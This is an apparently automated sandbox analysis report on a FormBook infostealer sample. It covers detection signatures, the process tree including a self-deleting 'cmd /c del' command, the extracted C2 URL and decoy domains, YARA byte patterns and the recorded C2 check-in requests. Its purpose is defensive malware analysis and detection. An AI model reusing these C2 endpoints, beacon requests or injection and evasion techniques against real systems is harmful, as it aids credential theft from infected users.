
Windows Analysis Report: nowy przyk#U0142adowy katalog.exe

Overview

General Information

Sample Name: nowy przyk#U0142adowy katalog.exe
Analysis ID: 515499
MD5: cbe0e49106fad96b2c1c155ce5b22abd
SHA1: 25a9a38c80446b631fc1de30440caba41ff8ec74
SHA256: a13cc23d40c93805a7305e090f5faf55d60b440e6d674ac333980ecd6c94bc60
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses Windows Living Off The Land Binaries (LOLBins)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Process Tree

  • System is w10x64
  • nowy przyk#U0142adowy katalog.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" MD5: CBE0E49106FAD96B2C1C155CE5B22ABD)
    • nowy przyk#U0142adowy katalog.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" MD5: CBE0E49106FAD96B2C1C155CE5B22ABD)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5596 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5632 cmdline: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bezhantrading.com/wtcv/"], "decoy": ["snowwisdom.com", "metaverseforecast.com", "mbc2digital.net", "palmspringsgolfacademy.com", "ff4cdhffx.xyz", "webdailysports.com", "alles-abgedeckt.com", "dempseynutrition.com", "egicsac.com", "nutrioclinic.com", "applebroog.industries", "trup.club", "937451.com", "cococutiecosmetics.store", "purwojati.com", "qeefame.com", "wbtqfuck.xyz", "huazhansat.com", "harada-insatsu.com", "thankugreece.com", "matthewandjessica.com", "giusepperosafio.com", "mhtqph.club", "clickcopywriting.com", "pausupport.com", "iccsukltd.com", "dtechmagento.com", "cplbet168.xyz", "leads-mania.club", "clairebuildsonline.com", "americanvisionvinyl.com", "ningyue.xyz", "cyfercode.com", "jasonjasura.com", "perspectiveofthepalm.com", "goodneighborurgentcare.com", "umityasarengin.com", "6016011.com", "percentrostered.com", "braveget.com", "skphoolmakhana.com", "uso4.com", "i7saan.com", "anderlecht.immo", "lurkingfilms.net", "affiliatemarketingproducts.xyz", "latiquecm.com", "tankomixing.com", "fatmochi.com", "terrisercovich.com", "melhoresdomessempretemm.com", "refugelarpsanfransico.com", "worryterrible.space", "0chong2.net", "bundleco.top", "lelegianstudies.com", "mreux.com", "charxprime.com", "sddn13.xyz", "luckychoice.net", "pluspace.com", "ibizguide.com", "lmdang.com", "rastipponmkh.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

Source | Rule | Description | Author | Strings
1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          System Summary:

Sigma detected: CMSTP Execution Process Creation
Source: Process started; Author: Nik Seetharaman; Data: Command: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe", CommandLine: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 5596, ProcessCommandLine: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe", ProcessId: 5632

          Jbx Signature Overview


          AV Detection:

Found malware configuration
Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook (configuration identical to the one listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: nowy przyk#U0142adowy katalog.exe; ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match; File source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for domain / URL
Source: bezhantrading.com; Virustotal: Detection: 5%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll; ReversingLabs: Detection: 13%
Machine Learning detection for sample
Source: nowy przyk#U0142adowy katalog.exe; Joe Sandbox ML: detected
Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.0.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.cmstp.exe.4b5796c.4.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.3.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.1.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.2.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.cmstp.exe.3bbc28.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: nowy przyk#U0142adowy katalog.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: cmstp.pdbGCTL; source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP; source: nowy przyk#U0142adowy katalog.exe, 00000000.00000003.355596507.000000000E880000.00000004.00000001.sdmp, nowy przyk#U0142adowy katalog.exe, 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, cmstp.exe, 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: nowy przyk#U0142adowy katalog.exe, cmstp.exe
Source: Binary string: cmstp.pdb; source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe; Code function: 0_2_00405EC2 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe; Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe; Code function: 0_2_00402671 FindFirstFileA,
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe; Code function: 0_2_10002F80 lstrcpyW,lstrlenW,lstrcpyW,lstrcatW,FindFirstFileW,wsprintfW,_GetThemeDocumentationProperty@16,_GetThemeDocumentationProperty@16,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe; Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe; Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe; Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmstp.exe; Code function: 4x nop then pop esi

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49773 -> 153.127.214.206:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49773 -> 153.127.214.206:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49773 -> 153.127.214.206:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 104.248.163.187 80
Source: C:\Windows\explorer.exe; Domain query: www.tankomixing.com
Source: C:\Windows\explorer.exe; Domain query: www.leads-mania.club
Source: C:\Windows\explorer.exe; Network Connect: 217.160.0.33 80
Source: C:\Windows\explorer.exe; Domain query: www.bezhantrading.com
Source: C:\Windows\explorer.exe; Domain query: www.americanvisionvinyl.com
Source: C:\Windows\explorer.exe; Network Connect: 46.38.243.234 80
Source: C:\Windows\explorer.exe; Domain query: www.iccsukltd.com
Source: C:\Windows\explorer.exe; Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe; Domain query: www.affiliatemarketingproducts.xyz
Source: C:\Windows\explorer.exe; Network Connect: 153.127.214.206 80
Source: C:\Windows\explorer.exe; Network Connect: 138.68.74.116 80
Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe; Network Connect: 172.67.184.156 80
Source: C:\Windows\explorer.exe; Domain query: www.worryterrible.space
Source: C:\Windows\explorer.exe; Domain query: www.alles-abgedeckt.com
Source: C:\Windows\explorer.exe; Domain query: www.dempseynutrition.com
Source: C:\Windows\explorer.exe; Domain query: www.harada-insatsu.com
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe; DNS query: www.affiliatemarketingproducts.xyz
Source: DNS query: www.sddn13.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.bezhantrading.com/wtcv/
Source: Joe Sandbox View; ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View; ASN Name: SAKURA-ASAKURAInternetIncJP SAKURA-ASAKURAInternetIncJP
Source: global traffic; HTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== HTTP/1.1; Host: www.worryterrible.space; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 HTTP/1.1; Host: www.americanvisionvinyl.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== HTTP/1.1; Host: www.iccsukltd.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 HTTP/1.1; Host: www.harada-insatsu.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 HTTP/1.1; Host: www.affiliatemarketingproducts.xyz; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 HTTP/1.1; Host: www.bezhantrading.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== HTTP/1.1; Host: www.alles-abgedeckt.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 HTTP/1.1; Host: www.leads-mania.club; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== HTTP/1.1; Host: www.tankomixing.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Thu, 04 Nov 2021 10:49:10 GMT; Content-Type: text/html; Content-Length: 275; ETag: "6182ae77-113"; Via: 1.1 google; Connection: close; Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Thu, 04 Nov 2021 10:49:15 GMT; Content-Type: text/html; Content-Length: 275; ETag: "6182b3d6-113"; Via: 1.1 google; Connection: close; Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Thu, 04 Nov 2021 10:48:29 GMT; Server: Apache/2.4.10 (Debian); Content-Length: 285; Connection: close; Content-Type: text/html; charset=iso-8859-1; Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.alles-abgedeckt.com Port 80</address></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Thu, 04 Nov 2021 10:50:03 GMT; Content-Type: text/html; charset=utf-8; Content-Length: 2963; Connection: close; x-wix-request-id: 1636023003.449130355506120675; Age: 0; Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2; Vary: Accept-Encoding; X-Content-Type-Options: nosniff; Server: Pepyaka/1.19.10; Data Ascii: <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robo
Source: cmstp.exe, 0000000B.00000002.620985574.0000000004CD2000.00000004.00020000.sdmp; String found in binary or memory: http://browsehappy.com/
Source: nowy przyk#U0142adowy katalog.exe; String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: nowy przyk#U0142adowy katalog.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000005.00000000.364768188.000000000095C000.00000004.00000020.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown; DNS traffic detected: queries for: www.worryterrible.space
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== HTTP/1.1Host: www.worryterrible.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.americanvisionvinyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== HTTP/1.1Host: www.iccsukltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.harada-insatsu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.affiliatemarketingproducts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.bezhantrading.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== HTTP/1.1Host: www.alles-abgedeckt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.leads-mania.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
